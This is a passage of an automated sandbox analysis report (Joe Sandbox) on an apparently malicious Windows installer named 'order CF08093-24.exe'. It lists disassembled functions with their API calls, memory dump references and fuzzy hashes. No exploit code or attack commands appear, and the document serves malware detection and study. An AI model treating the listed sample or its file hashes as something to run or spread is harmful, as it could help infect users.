                                                                            • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                            • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                            • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                            • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                                            • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                            • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                            Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                            • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                            • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                            • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                            Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                            • wsprintfW.USER32 ref: 00404E17
                                                                            • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                            • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                                            • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                            • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                            Function 00405E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-823278215
                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                                            Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                                            • GetTickCount.KERNEL32 ref: 0040306F
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                            • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                            • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                            • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                            Function 00405F18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405EC9
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                            • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405F71
                                                                            • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-823278215
                                                                            • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                            • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                                            • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                            • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                                            Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405569
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                              • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                            • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                            • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                            • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                            Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406680,80000002), ref: 00406455
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: : Completed
                                                                            • API String ID: 3356406503-2954849223
                                                                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                            • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                                            Function 00403B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-823278215
                                                                            • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                            • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                                            • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                            • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                                            Function 00405E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-1246513382
                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                                            Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                            • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
